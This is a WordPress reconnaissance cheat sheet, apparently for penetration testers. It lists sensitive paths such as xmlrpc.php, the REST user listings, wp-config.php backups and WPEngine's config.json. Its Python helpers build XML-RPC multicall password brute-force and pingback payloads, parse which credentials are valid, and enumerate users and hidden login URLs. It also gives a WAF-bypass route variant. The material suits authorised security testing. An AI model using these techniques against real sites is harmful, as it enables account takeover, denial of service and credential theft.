Main Page

Default main page

/index.php

Potential Version Disclosure

Contains potentially useful information such as the version of WordPress installed (only in very old WordPress versions; current releases ship a generic license.txt without it)

/license.txt

Email Service

Activation page for accounts and sites created through the signup process. It is only meaningful on multisite installs, where the activation key from the confirmation email is submitted here.

/wp-activate.php

Login Page

Default login page for WordPress. Sometimes certain paths are blocked, so test all of them. If the login path has been changed (for example by a hide-login plugin), you might still be redirected to the correct one.

/wp-login.php
/wp/wp-login.php
/wp-login/
/login/
/wp-admin.php
/wp-admin/
/wordpresswp-admin/wp-login.php

Hidden Admin Login

Sometimes the login page is well hidden and a simple /wp-admin/ request is not enough to get redirected to it. Another way to locate it is through a page or post that renders the comment form while comments require login. Navigate to the following URL (the ID parameter value might need to be adjusted):

/wp-admin/post.php?id=123

If successful, you may in some instances be able to grep for must-log-in. The comment form builds this paragraph with the site's login URL (via wp_login_url(), which is exactly what hide-login plugins rewrite), so the string exposes the endpoint where the admin login page is located on the application:

<p class="must-log-in">You must be <a href="https://example.com/path-to-admin-panel.php/?redirect_to=https%3A%2F%2Fexample.com%2Fen%2F404%2F">logged in</a> to post a comment.</p>
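Extracting that login URL from a fetched page is a small parsing job; the snippet below is an added example, not code from the original page. It pulls the href out of the must-log-in paragraph, strips the redirect_to parameter so only the login path remains, and returns None when the page has no such paragraph (comments open to everyone, or comments disabled). The HTML it runs on is a constructed sample; the login path in it is made up.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


class MustLogInParser(HTMLParser):
    """Collect the href of any <a> nested inside <p class="must-log-in">."""

    def __init__(self):
        super().__init__()
        self.in_must_log_in = False
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        classes = (attrs.get("class") or "").split()
        if tag == "p" and "must-log-in" in classes:
            self.in_must_log_in = True
        elif tag == "a" and self.in_must_log_in and attrs.get("href"):
            # HTMLParser already unescapes &amp; in attribute values
            self.hrefs.append(attrs["href"])

    def handle_endtag(self, tag):
        if tag == "p":
            self.in_must_log_in = False


def find_login_url(html):
    """Return the login URL without its redirect_to query, or None if absent."""
    parser = MustLogInParser()
    parser.feed(html)
    if not parser.hrefs:
        return None
    parts = urlsplit(parser.hrefs[0])
    return parts._replace(query="", fragment="").geturl()


# Constructed sample: a post page whose comment form demands login.
# The login path used here is invented for the example.
SAMPLE_PAGE = (
    '<html><body><div id="comments">'
    '<p class="must-log-in">You must be <a href="https://example.com/'
    'secret-login/?redirect_to=https%3A%2F%2Fexample.com%2Fen%2F404%2F">'
    'logged in</a> to post a comment.</p></div></body></html>'
)

# Constructed sample: comments open to everyone, so no must-log-in paragraph.
SAMPLE_OPEN_COMMENTS = (
    '<html><body><form action="https://example.com/wp-comments-post.php">'
    '<p>Leave a reply</p></form></body></html>'
)

if __name__ == "__main__":
    print(find_login_url(SAMPLE_PAGE))           # https://example.com/secret-login/
    print(find_login_url(SAMPLE_OPEN_COMMENTS))  # None
```

Feed it the body of the response you got for the post URL; the parser ignores any other anchors on the page, so theme markup around the comment form does not produce false hits.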

Default Administration Page

Default administration panel for WordPress (the actual entry point is the /wp-admin/ directory). You need to be authenticated to access it; unauthenticated requests are redirected to the login page.

/wp-admin.php

Developers API

An API for developers and remote clients to talk to the application. It is enabled by default (since WordPress 3.5). The pingback.ping method makes the site fetch an attacker-chosen URL, which can be abused for reflected DDoS against other applications or for probing hosts the site can reach; the request the site sends carries its WordPress version in the User-Agent header. The wp.getUsersBlogs method takes a username and password, so the application can be made to brute force its own users. Wrapped in the system.multicall method, many credential pairs can be tested with one request alone, which sidesteps per-request rate limits and puts heavy load on the server (potential DoS). Read more about this within XML-RPC

/xmlrpc.php
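The two payload shapes described above, as an added example built with Python's standard xmlrpc.client (not code from the original page). build_multicall_login() wraps one wp.getUsersBlogs call per credential pair in a single system.multicall request, build_pingback() produces the pingback.ping request, and parse_multicall_login() pairs each multicall result with the credentials that produced it. WordPress answers a bad login inside a multicall with a fault struct (faultCode 403) and a good one with an array holding the user's blog list; the response used here is constructed with dumps() to have exactly that shape, and the credentials and hostnames are made up.

```python
import xmlrpc.client


def build_multicall_login(credentials):
    """One wp.getUsersBlogs call per (username, password) pair, in one request."""
    calls = [
        {"methodName": "wp.getUsersBlogs", "params": [user, password]}
        for user, password in credentials
    ]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def build_pingback(source_url, target_url):
    """pingback.ping(sourceURI, targetURI): the site fetches source_url to verify
    that it links to target_url, so source_url is where the request lands."""
    return xmlrpc.client.dumps((source_url, target_url), methodname="pingback.ping")


def parse_multicall_login(response_xml, credentials):
    """Pair every multicall result with its credentials.

    Inside system.multicall a failed call comes back as a struct with
    faultCode/faultString, a successful one as a one-element array holding the
    method's return value (for wp.getUsersBlogs: the list of blogs). A top-level
    fault (e.g. XML-RPC disabled) makes loads() raise xmlrpc.client.Fault.
    """
    (results,), _ = xmlrpc.client.loads(response_xml)
    outcome = []
    for (user, password), result in zip(credentials, results):
        if isinstance(result, dict):
            outcome.append((user, password, False, result.get("faultString")))
        else:
            outcome.append((user, password, True, result[0]))
    return outcome


# Constructed credential list and response for the example (not real data).
CREDENTIALS = [("admin", "wrong-guess"), ("admin", "Winter2024!")]

SAMPLE_RESPONSE = xmlrpc.client.dumps(
    ([
        {"faultCode": 403, "faultString": "Incorrect username or password."},
        [[{"isAdmin": True, "url": "https://example.com/", "blogid": "1",
           "blogName": "Example", "xmlrpc": "https://example.com/xmlrpc.php"}]],
    ],),
    methodresponse=True,
)

if __name__ == "__main__":
    print(build_multicall_login(CREDENTIALS))
    print(build_pingback("https://victim.example/", "https://example.com/?p=1"))
    for user, password, ok, detail in parse_multicall_login(SAMPLE_RESPONSE, CREDENTIALS):
        print(user, password, "VALID" if ok else "invalid", detail)
```

The payload goes in the body of a POST to /xmlrpc.php with Content-Type text/xml; keep the batch size modest, since a multicall that is too large is itself the DoS the text warns about.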

Plugin and Theme Storage

Directory where plugins (/wp-content/plugins/) and themes (/wp-content/themes/) are stored within the application. Directory listing is often seen, and the listed folder names tell you which plugins and themes to check for known issues!

/wp-content/

File Upload Storage

The directory where files uploaded through the media library are stored (unless a plugin uploads elsewhere). Directory listing is often seen!

/wp-content/uploads/

Core Files

This is the directory where core files are stored, such as the CA certificate bundle, fonts, JavaScript files and widgets. Directory listing is often seen!

/wp-includes/

Configuration File

Contains the database name, database host, username, password, the authentication keys and salts, and the database table prefix. This configuration file also holds the switch for DEBUG mode, which can be useful when troubleshooting. The file itself is executed by PHP and returns nothing, so the interesting target is any editor or backup copy left next to it (such as the .save variant below), which the web server serves as plain text.

/wp-config.php
/wp-config.php.save

Cron Endpoint

Every request to this file makes WordPress check for scheduled events that are due and run them, which costs database queries plus whatever the scheduled jobs do. Because it is reachable without authentication, repeated requests can be used by attackers to perform a DoS; how expensive each request is depends on what is scheduled and on the size of the site.

/wp-cron.php

This one is not the same as wp-cron.php: it is the library of scheduling functions that wp-cron.php uses, and requesting it directly returns nothing useful. Nothing else can be exploited here!

/wp-includes/cron.php

Registered Users

Shows you a list of users registered on the application (by default only those who have authored published content). Sometimes the application uses a WAF whose rules are case sensitive; because WordPress matches REST routes case-insensitively, the last variant may then still work

/wp-json/wp/v2/users
/?rest_route=/wp/v2/users
/?rest_route=/wp/v2/uSeRS

Register Page

Registration page. Keep in mind that a default WordPress install keeps registration disabled ("Anyone can register" is unchecked), in which case the form is replaced by a message that registration is not allowed. If lucky, an admin enabled it at a later date and forgot to disable it. The parameters make a difference: wp-login.php only shows the registration form for action=register, and wp-signup.php is the separate signup form of multisite installs.

/wp-register.php
/wp/wp-login.php
/wp-login.php?action=register
/wp/wp-login.php?action=register
/wp-signup.php
/wp/wp-signup.php

Default Readme File

If the generator meta tag has been disabled, check for the presence of /readme.html at the root of the install. Early versions of WordPress had the version right there at the top of the readme.html file. Newer versions of WordPress have removed the version from the file.

/readme.html

Page Content via REST API

There may be an internal host disclosure within these responses: the guid field is set when a page is created and keeps whatever site URL was configured at the time, so it can reveal an internal or staging hostname that the public link field no longer shows. The listing is also a way to find administrative pages or other parts of the application that are not in use or are otherwise inaccessible by normal navigation, such as forgotten pages containing contact forms or upload functionality. Remember to keep enumerating. Just because the listing might end at 300 doesn't mean there's no page with an ID of 794. These gaps happen when pages are deleted and new ones are created: if pages 1 to 4 have been removed but page 5 exists, requesting the single-page endpoint with ID 5 still returns its data.

/wp-json/wp/v2/pages
/wp-json/wp/v2/pages/<ID>

Public Comments via REST API

Navigating to one of these URLs shows the public comments. The link field points at the page where the comment was made, author is the numeric ID of the WordPress user who wrote it (0 for guest comments), and author_name is a display name, which is not the same as the actual login name used to sign in to the WordPress account.

/wp-json/wp/v2/comments
/wp-json/wp/v2/comments/<ID>
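The three REST listings above (users, pages, comments) are plain JSON, and the checks described for them fit in a few functions; the block below is an added example, not code from the original page. It reports user slugs (normally the login name) next to display names, finds hostnames in link/guid that differ from the public host, lists the ID gaps worth requesting individually, and maps each comment's numeric author back to a login slug so a display name can be told apart from a guest who merely typed the same name. The three JSON documents are constructed samples; the hostnames, IDs and names are invented.

```python
import json
from urllib.parse import urlsplit

# Constructed sample responses standing in for the three endpoints (not real data).
USERS_JSON = json.dumps([
    {"id": 1, "name": "Site Admin", "slug": "admin",
     "link": "https://example.com/author/admin/"},
    {"id": 7, "name": "Jane Doe", "slug": "jdoe",
     "link": "https://example.com/author/jdoe/"},
])
PAGES_JSON = json.dumps([
    {"id": 2, "title": {"rendered": "Sample Page"},
     "link": "https://example.com/sample-page/",
     "guid": {"rendered": "http://wp-internal.local/?page_id=2"}},
    {"id": 5, "title": {"rendered": "Contact"},
     "link": "https://example.com/contact/",
     "guid": {"rendered": "http://wp-internal.local/?page_id=5"}},
    {"id": 9, "title": {"rendered": "Upload portal"},
     "link": "https://example.com/upload-portal/",
     "guid": {"rendered": "https://example.com/?page_id=9"}},
])
COMMENTS_JSON = json.dumps([
    {"id": 11, "post": 5, "author": 7, "author_name": "Jane Doe",
     "link": "https://example.com/contact/#comment-11"},
    {"id": 12, "post": 5, "author": 0, "author_name": "Jane Doe",
     "link": "https://example.com/contact/#comment-12"},
])


def user_candidates(users_json):
    """(id, slug, display name): slug is normally the login name, name is not."""
    return [(u["id"], u["slug"], u["name"]) for u in json.loads(users_json)]


def foreign_hosts(pages_json, public_host):
    """Hostnames in link or guid that differ from the public host."""
    hosts = set()
    for page in json.loads(pages_json):
        for url in (page.get("link"), page.get("guid", {}).get("rendered")):
            host = urlsplit(url or "").hostname
            if host and host != public_host:
                hosts.add(host)
    return hosts


def id_gaps(pages_json):
    """IDs between the lowest and highest listed that the listing skips."""
    ids = {p["id"] for p in json.loads(pages_json)}
    return [i for i in range(min(ids), max(ids) + 1) if i not in ids]


def comment_authors(comments_json, users_json):
    """(comment id, author_name, login slug or None for guest comments)."""
    slug_by_id = {uid: slug for uid, slug, _ in user_candidates(users_json)}
    return [
        (c["id"], c["author_name"], slug_by_id.get(c["author"]) if c["author"] else None)
        for c in json.loads(comments_json)
    ]


if __name__ == "__main__":
    print(user_candidates(USERS_JSON))
    print(foreign_hosts(PAGES_JSON, "example.com"))
    print(id_gaps(PAGES_JSON))
    print(comment_authors(COMMENTS_JSON, USERS_JSON))
```

On a real target, collect the pages listing across all of it with per_page=100&page=N before computing gaps, then request /wp-json/wp/v2/pages/<ID> for each gap: a 404 means deleted, a 401 means the page exists but is not public.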

More Generator Locations

The generator tag exposes the WordPress version. Additionally, the feed paths tend to expose registered users, or at least their display names (the dc:creator element of each item). Get these verified within a user enumeration before believing they are login names on the app.

/feed/
/feed/rss/
/feed/rss2/
/feed/rdf/
/feed/atom/
/wp-rdf.php
/wp-rss.php
/wp-rss2.php
/wp-atom.php

There is an additional feed after the search path which may disclose users and/or the WordPress version

/search/{search_here}/feed/rss2/

If a WAF blocks the pretty paths, the query-string forms of the same feeds are worth trying as well, e.g. /?feed=rss2 and /?s={search_here}&feed=rss2

wp-links-opml.php

The endpoint exports the site's links (the legacy blogroll) in OPML format. Its output starts with a generator comment, revealing the WordPress version. Adding the secondary payload passes an array where a string is expected; the resulting PHP error may expose an internal path when error display is enabled:

/wp-links-opml.php
/wp-links-opml.php?link_cat[]
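The version strings discussed across this page (the generator meta tag, the feed generator element, the wp-links-opml.php comment and the old readme.html heading) all have a fixed shape, so one function can fingerprint whichever body you fetched; the block below is an added example, not code from the original page, and also pulls the dc:creator names out of a feed as the "More Generator Locations" section suggests. The four sample bodies are constructed to match the real formats; the version number and names in them are made up.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample bodies (not captured from a real site).
META_HTML = '<html><head><meta name="generator" content="WordPress 6.4.2" /></head></html>'
FEED_XML = """<?xml version="1.0"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel><title>Example</title>
<generator>https://wordpress.org/?v=6.4.2</generator>
<item><title>Hello</title><dc:creator><![CDATA[Jane Doe]]></dc:creator></item>
<item><title>Second</title><dc:creator><![CDATA[Site Admin]]></dc:creator></item>
<item><title>Third</title><dc:creator><![CDATA[Jane Doe]]></dc:creator></item>
</channel></rss>"""
OPML_XML = ('<?xml version="1.0"?>\n'
            '<!-- generator="WordPress/6.4.2" created="Mon, 01 Jan 2024 00:00:00 +0000" -->\n'
            '<opml version="1.0"><head><title>Links</title></head><body></body></opml>')
OLD_README = ('<h1 id="logo"><img alt="WordPress" src="wp-admin/images/wordpress-logo.png" />'
              '<br /> Version 2.9.2</h1>')

# One pattern per disclosure location; each captures the version number.
VERSION_PATTERNS = [
    re.compile(r'name="generator"\s+content="WordPress\s+([\d.]+)"', re.I),        # meta tag
    re.compile(r'<generator>https?://wordpress\.org/\?v=([\d.]+)</generator>', re.I),  # feeds
    re.compile(r'generator="WordPress/([\d.]+)"'),                                   # wp-links-opml.php
    re.compile(r'<br\s*/?>\s*Version\s+([\d.]+)', re.I),                             # old readme.html
]


def find_wordpress_version(body):
    """Return the first WordPress version string found in a fetched body, or None."""
    for pattern in VERSION_PATTERNS:
        match = pattern.search(body)
        if match:
            return match.group(1)
    return None


def feed_creators(feed_xml):
    """Unique dc:creator display names from a feed, in order of first appearance.
    Verify them with user enumeration before treating them as login names."""
    root = ET.fromstring(feed_xml)
    tag = "{http://purl.org/dc/elements/1.1/}creator"
    names = []
    for element in root.iter(tag):
        name = (element.text or "").strip()
        if name and name not in names:
            names.append(name)
    return names


if __name__ == "__main__":
    for label, body in [("meta", META_HTML), ("feed", FEED_XML),
                        ("opml", OPML_XML), ("readme", OLD_README)]:
        print(label, find_wordpress_version(body))
    print(feed_creators(FEED_XML))
```

Run find_wordpress_version() over each of the paths listed on this page and compare the results: a mismatch between, say, the meta tag and the feed usually means a plugin is spoofing one of them.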

WPEngine Database Credentials

WPEngine is a provider of managed WordPress hosting. WPEngine creates a folder named _wpeprivate that contains the file config.json. This file contains highly sensitive information such as the WPEngine database credentials and should not be publicly accessible. It has been confirmed that in some instances it is possible to access this file without authorization. If you see signs of WPEngine, test for this!

/_wpeprivate/config.json